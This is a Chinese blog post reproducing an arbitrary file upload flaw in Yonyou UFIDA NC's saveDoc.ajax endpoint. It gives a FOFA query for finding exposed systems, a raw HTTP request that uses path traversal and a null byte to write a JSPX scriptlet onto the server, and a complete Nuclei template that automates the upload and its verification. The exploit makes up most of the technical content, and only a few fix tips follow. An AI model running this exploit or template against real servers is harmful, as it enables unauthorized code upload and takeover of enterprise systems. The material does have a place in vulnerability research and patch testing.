用友-UFIDA-NC saveDoc.ajax 存在任意文件上传漏洞

最新推荐文章于 2024-03-08 09:45:00 发布
最新推荐文章于 2024-03-08 09:45:00 发布
阅读量942 收藏 10
点赞数 10
分类专栏: 漏洞复现 文章标签: ajax 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52204925/article/details/136499668
版权

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

                                                                                                                                              

目录

Ⅰ、漏洞描述

Ⅱ、fofa语句

Ⅲ、漏洞复现

1、发送数据包,上传测试文件

2、访问上传文件

Ⅳ、Nuclei-POC

Ⅴ、修复建议

Ⅰ、漏洞描述

用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。

用友-UFIDA-NC saveDoc.ajax 存在任意文件上传,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!

Ⅱ、fofa语句

title="产品登录界面"

Ⅲ、漏洞复现

POC

POST /uapws/saveDoc.ajax?ws=/../../test1.jspx%00 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Content-Type: application/x-www-form-urlencoded

content=<hi xmlns:hi="http://java.sun.com/JSP/Page">
      <hi:directive.page import="java.util.*,java.io.*,java.net.*"/>
   <hi:scriptlet>
            out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); 
   </hi:scriptlet>
</hi>

1、发送数据包,上传测试文件

2、访问上传文件

http://127.0.0.1/uapws/test1.jspx

Ⅳ、Nuclei-POC

id: yonyou-UFIDA-NC-saveDoc-ajax-uploadfile

info:
  name: 用友-UFIDA-NC saveDoc.ajax 存在任意文件上传,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!
  author: WLF
  severity: high
  metadata: 
    fofa-query: title="产品登录界面"
variables:
  filename: "{{to_lower(rand_base(5))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /uapws/saveDoc.ajax?ws=/../../{{filename}}.jspx%00 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
        Content-Type: application/x-www-form-urlencoded

        content=<hi xmlns:hi="http://java.sun.com/JSP/Page">
              <hi:directive.page import="java.util.*,java.io.*,java.net.*"/>
          <hi:scriptlet>
                    out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); 
          </hi:scriptlet>
        </hi>

      - |
        GET /uapws/{{filename}}.jspx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"Hello World!")

Ⅴ、修复建议

1、请联系厂商进行修复或者升级到安全版本;

2、如非必要,禁止公网访问该系统;

3、设置白名单访问。

Love Seed
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用友 NC saveDoc.ajax 任意文件上传漏洞
weixin_43567873的博客
03-10 74
用友 NC saveDoc.ajax 任意文件上传漏洞
用友UAP-NC总体介绍
03-04
作为UFIDA NC构建基础的UAP-NC是一个遵循J2EE技术规范,以企业业务信息管理和企业资源管理为基础,以业务过程控制管理为核心,支持工作流管理和业务流程重组的企业应用运行平台;是基于模式化和提供可视化建模工具的开发平台;是开放的、基于SOA、支持多种集成方式的系统集成平台;是统一的支持JMX的系统管理平台。
用友NC Cloud soapFormat.ajax接口XXE漏洞复现 [附POC]
薛定谔嘚喵博客
01-08 543
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。用友NC Cloud soapFormat.ajax接口XXE漏洞
用友NC saveDoc.ajax 任意文件上传漏洞复现
Keepb1ue的博客
03-06 711
用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。
Ufida.T.EAP.Dog.Service.dll
02-27
50 users
用友 NC saveDoc.ajax 任意文件上传漏洞复现
0xSec
03-06 774
用友 NC saveDoc.ajax接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友UFIDA-NC-saveDoc任意文件上传漏洞
最新发布
qq_36334672的博客
03-08 383
用友-UFIDA-NC saveDoc.ajax 存在任意文件上传,攻击者可通过此漏洞上传恶意脚本文件,获取系统权限。
用友portal接口存在任意文件读取漏洞
waxcj的博客
01-22 477
用友portal接口存在任意文件读取漏洞
用友NC-Cloud INtbOBAWebService xxe漏洞
weixin_52204925的博客
02-28 688
该系统/uapws/service/nc.itf.tb.oba.INtbOBAWebService接口存在XXE漏洞,恶意攻击者可能会利用该命令在xml中构造恶意命令,可能会导致服务器失陷或者敏感信息泄露。
用友NC Cloud存在前台远程命令执行漏洞
holyxp的博客
07-22 467
用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。
用友NC57_UFIDA_NC_5.7建筑行业集团版_安装指南
01-19
用友NC57_UFIDA_NC_5.7建筑行业集团版_安装指南
UFIDA NC 5.7发版说明.doc
04-03
用友nc5.7发版说明 UFIDA NC V5.7版本,是在NC四化经营理念下,总结现有4000多家高端客户的应用模式和管理要求,推出的应用更全面、产品更完整、使用更稳定、性能更高效的高端集团企业解决方案。 全球化集团管控,在V57版本重点加强深化了集团资金管理、人力资源管理、全面预算管理、资产维修维护等领域应用,并推出全面的企业治理产品,提供集团企业内控与风险管理的解决方案。
UFIDA-NC供应链操作手册
06-13
UFIDA-NC供应链操作手册UFIDA-NC供应链操作手册UFIDA-NC供应链操作手册UFIDA-NC供应链操作手册UFIDA-NC供应链操作手册
建筑地产行业实施工具-13操作手册库-UFIDA NC 5.6建筑行业产品发版说明.doc
08-16
NC
用友C-UFIDA实施方法论V5.0-项目管理.ppt
01-02
用友C-UFIDA实施方法论V5.0-项目管理.ppt
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
用友C-UFIDA实施方法论V5.0-实施指南.ppt
01-02
用友C-UFIDA实施方法论V5.0-实施指南.ppt
用友-Ufida-Yonyou:03-XX地产集团项目管理系统调研问卷v1.0.doc
06-22
用友-Ufida-Yonyou:03-XX地产集团项目管理系统调研问卷v1.0
ufsoft.aif.mom.common.messageobjectmodel.xml
06-06
ufsoft.aif.mom.common.messageobjectmodel.xml是一个XML文件,它是一种数据交换格式,用于描述和传递消息对象模型(MOM)的信息。这个XML文件是由UFIDA公司开发的,用于在它们的软件产品中实现数据交换。 在ufsoft.aif.mom.common.messageobjectmodel.xml中,包含了MOM中定义的各种消息对象模型的信息,例如采购订单、销售订单、发票、付款单等。这些消息对象都有自己的属性和行为,可以通过该XML文件对它们进行描述和传递。 该XML文件的结构比较复杂,它包含了多个命名空间和复杂的元素分层结构。其中还包括了各种数据类型的定义,例如字符串、整型、日期等。 这个XML文件在实现数据交换时,可以通过不同的数据传输协议进行传输。例如,可以通过HTTP、SOAP、FTP等协议来传输XML文件并进行数据交换。 总之,ufsoft.aif.mom.common.messageobjectmodel.xml是一个用于描述和传递MOM中消息对象模型信息的XML文件,它是实现数据交换的重要组成部分。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值